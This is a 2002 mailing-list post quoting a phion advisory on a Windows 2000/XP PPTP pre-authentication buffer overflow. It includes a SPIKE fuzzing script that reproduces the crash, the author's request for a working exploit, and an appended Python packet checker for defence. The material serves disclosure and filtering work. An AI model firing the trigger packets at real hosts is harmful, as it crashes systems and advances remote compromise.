SPIKE 2.6.2 or above should be able to handle this .spk file which will replicate the vulnerability. Someone send me a working sploit in exchange, please. I'm too lazy to muck with it. (Or I have other exploits to muck with, one or the other :>)
-dave

P.S. Grab new SPIKE releases (2.6.2 for SPIKE and 1.3 for SPIKE Proxy) at http://www.immunitysec.com/spike.html, if you haven't already.

P.P.S. This script is released under the terms of the GNU GPL v 2.0.

On Thu, 2002-09-26 at 05:43, [EMAIL PROTECTED] wrote:
> phion Security Advisory 26/09/2002
>
> Microsoft PPTP Server and Client remote vulnerability
>
>
> Summary
> -----------------------------
>
> The Microsoft PPTP Service shipping with Windows 2000 and XP contains a
> remotely exploitable pre-authentication buffer overflow.
>
>
> Affected Systems
> -----------------------------
>
> Microsoft Windows 2000 and XP running either a PPTP Server or Client.
>
>
> Impact
> -----------------------------
>
> With a specially crafted PPTP packet it is possible to overwrite kernel
> memory.
>
> A DoS resulting in a lockup of the machine has been verified on
> Windows 2000 SP3 and Windows XP.
>
> A remote compromise should be possible deploying proper shellcode,
> as we were able to fill EDI and EDX with our data.
>
> Clients are vulnerable too, because the Service always listens on port
> 1723 on any interface of the machine; this might be of special concern
> to DSL users who use PPTP to connect to their modem.
>
>
> Solution
> -----------------------------
>
> As a temporary solution for the Client issue, one might firewall the PPTP
> port in the Internet Connection Firewall for Windows XP.
>
> We don't know of any solution for Windows 2000 and Windows XP PPTP servers.
>
> The vendor has been informed.
>
>
> Acknowledgements
> -----------------------------
>
> The bug has been discovered by Stephan Hoffmann and Thomas Unterleitner
> on behalf of phion Information Technologies.
>
>
> Contact Information
> -----------------------------
>
> phion Information Technologies can be reached via:
> [EMAIL PROTECTED] / http://www.phion.com
>
> Stephan Hoffmann can be reached via:
> [EMAIL PROTECTED]
>
> Thomas Unterleitner can be reached via:
> [EMAIL PROTECTED]
>
> References
> -----------------------------
>
> [1] phion Information Technologies
> http://www.phion.com/
>
> Exploit
> -----------------------------
>
> phion Information Technologies will not provide an exploit for this issue.
>
>
> Disclaimer
> -----------------------------
>
> This advisory does not claim to be complete or to be usable for any
> purpose.
>
> This advisory is free for open distribution in unmodified form.
>
> Articles or Publications that are based on information from this advisory
> have to include link [1].
//start control request
s_block_start("PPTP");
s_binary_block_size_halfword_bigendian("PPTP");
//PPTP message type 1 - control message
s_int_variable(0x0001,5);
//cookie
s_binary("1a 2b 3c 4d");
//type 1 - start control request
//5 is big endian halfword
s_int_variable(0x0001,5);
//reserved
s_binary("0000");
//version 1.0
s_int_variable(0x0100,5);
//reserved
s_binary("0000");
//framing capabilities: 0x3 = asynchronous + synchronous framing supported
s_binary("00000003");
//Bearer: Digital
s_binary("00000002");
//maximum channels
s_binary("ffff");
//firmware revision
s_int_variable(0x0001,5);
//hostname
s_string_variable("A");
s_binary_repeat("00",63);
//vendor
s_string_variable("A");
s_binary_repeat("00",63);
s_block_end("PPTP");
///
/// NEXT PACKET
///
///
//start outgoing call request
s_block_start("PPTP2");
s_binary_block_size_halfword_bigendian("PPTP2");
//PPTP message type 1 - control message
s_int_variable(0x0001,5);
//cookie
s_binary("1a 2b 3c 4d");
//type 7 - outgoing call request
//5 is big endian halfword
s_int_variable(0x0007,5);
//reserved
s_binary("0000");
//call id
s_binary("0000");
//serial number
s_binary("0000");
//min bps
s_binary("00000960");
//max bps
s_binary("00989680");
//bearer capabilities
s_binary("00000002");
//framing
s_binary("00000003");
//receive window size
s_binary("0003");
//processing delay
s_binary("0000");
//phone number length - filled with the size of the PHONENUMBER block defined below
s_binary_block_size_halfword_bigendian("PHONENUMBER");
//reserved
s_binary("0000");
s_block_start("PHONENUMBER");
s_string_variable("");
s_block_end("PHONENUMBER");
//subaddress
s_string_variable("");
s_block_end("PPTP2");
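As an added example (not part of Dave's post, not SPIKE code, and not the advisory's), the following Python encodes the two control messages the script above builds, using the field layout and fixed sizes from RFC 2637, and runs the sanity checks a defender would apply to traffic arriving on TCP/1723: the length field must agree with the bytes on the wire, each fixed-size message must have its fixed size, and the phone number length must fit inside its 64-byte field. The unpadded variant is constructed here to mirror what the second SPIKE block emits (variable-length phone number and subaddress with no padding); it is not a byte-for-byte capture of SPIKE output.

```python
import struct

# PPTP control channel constants from RFC 2637, the same values the SPIKE
# script above places on the wire.
PPTP_CTRL_PORT = 1723
MSG_TYPE_CONTROL = 1           # PPTP Message Type: 1 = control message
MAGIC_COOKIE = 0x1A2B3C4D      # fixed magic cookie
SCCRQ = 1                      # Start-Control-Connection-Request
OCRQ = 7                       # Outgoing-Call-Request
CTRL_NAMES = {SCCRQ: "Start-Control-Connection-Request",
              OCRQ: "Outgoing-Call-Request"}
# Both messages are fixed size, counted including the 2-byte length field.
FIXED_LENGTH = {SCCRQ: 156, OCRQ: 168}
FIELD64 = 64                   # host name, vendor, phone number, subaddress


def build_sccrq(hostname=b"A", vendor=b"A"):
    """Encode a Start-Control-Connection-Request as the first SPIKE block does."""
    body = struct.pack("!HIHHHHIIHH",
                       MSG_TYPE_CONTROL, MAGIC_COOKIE, SCCRQ, 0,
                       0x0100,      # protocol version 1.0
                       0,           # reserved
                       3,           # framing capabilities: async + sync
                       2,           # bearer capabilities: digital
                       0xFFFF,      # maximum channels
                       1)           # firmware revision
    # Host name and vendor string are 64-byte fields (the script pads each
    # one-byte string with 63 NULs); no truncation, matching SPIKE.
    body += hostname.ljust(FIELD64, b"\0") + vendor.ljust(FIELD64, b"\0")
    return struct.pack("!H", len(body) + 2) + body


def build_ocrq(phone=b"", subaddress=b"", rfc_padding=True):
    """Encode an Outgoing-Call-Request.

    With rfc_padding the phone number and subaddress are padded to their
    64-byte fields as RFC 2637 requires.  Without it they are emitted raw and
    the length fields are derived from the actual sizes, which is what the
    second SPIKE block does (constructed here to mirror the script).
    """
    phone_field = phone.ljust(FIELD64, b"\0") if rfc_padding else phone
    sub_field = subaddress.ljust(FIELD64, b"\0") if rfc_padding else subaddress
    body = struct.pack("!HIHHHHIIIIHHHH",
                       MSG_TYPE_CONTROL, MAGIC_COOKIE, OCRQ, 0,
                       0, 0,                 # call id, call serial number
                       0x960, 0x989680,      # minimum / maximum bps
                       2, 3,                 # bearer type digital, framing type
                       3, 0,                 # receive window size, processing delay
                       len(phone), 0)        # phone number length, reserved
    body += phone_field + sub_field
    return struct.pack("!H", len(body) + 2) + body


def check_pptp_control(pkt: bytes) -> list:
    """Return the list of consistency problems in one PPTP control message.

    An empty list means the message passed every check.  The checks only
    read length fields and compare them with the bytes actually present, so
    they are safe to run on untrusted input.
    """
    problems = []
    if len(pkt) < 12:
        return ["packet shorter than the 12-byte PPTP control header"]
    length, msg_type, cookie, ctrl_type = struct.unpack("!HHIH", pkt[:10])
    if length != len(pkt):
        problems.append(f"length field {length} != {len(pkt)} bytes on the wire")
    if msg_type != MSG_TYPE_CONTROL:
        problems.append(f"message type {msg_type} is not a control message")
    if cookie != MAGIC_COOKIE:
        problems.append(f"magic cookie {cookie:#010x} is wrong")
    expected = FIXED_LENGTH.get(ctrl_type)
    if expected is not None and len(pkt) != expected:
        problems.append(f"{CTRL_NAMES[ctrl_type]} is {len(pkt)} bytes, "
                        f"RFC 2637 fixes it at {expected}")
    if ctrl_type == OCRQ and len(pkt) >= 38:
        # Phone Number Length sits at offset 36; the phone number itself
        # begins at offset 40 after a 2-byte reserved field.
        (phone_len,) = struct.unpack("!H", pkt[36:38])
        if phone_len > FIELD64:
            problems.append(f"phone number length {phone_len} exceeds the 64-byte field")
        if 40 + phone_len > len(pkt):
            problems.append(f"phone number length {phone_len} runs past the end of the packet")
    return problems


if __name__ == "__main__":
    samples = {
        "SCCRQ as the script sends it": build_sccrq(),
        "OCRQ padded per RFC 2637": build_ocrq(b"5551234"),
        "OCRQ as the script sends it (unpadded, empty phone number)":
            build_ocrq(rfc_padding=False),
        "OCRQ with a 200-byte phone number (fuzz case)":
            build_ocrq(b"A" * 200, rfc_padding=False),
    }
    for name, pkt in samples.items():
        problems = check_pptp_control(pkt)
        print(f"{name}: {'ok' if not problems else '; '.join(problems)}")
```

The two SPIKE blocks pass the cookie and message-type checks but the second one fails the fixed-size check, because the phone number and subaddress are emitted without their 64-byte padding; a length-consistency check of this kind on a PPTP gateway or an inline filter is the cheapest way to drop such malformed control messages before a kernel-side parser sees them.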
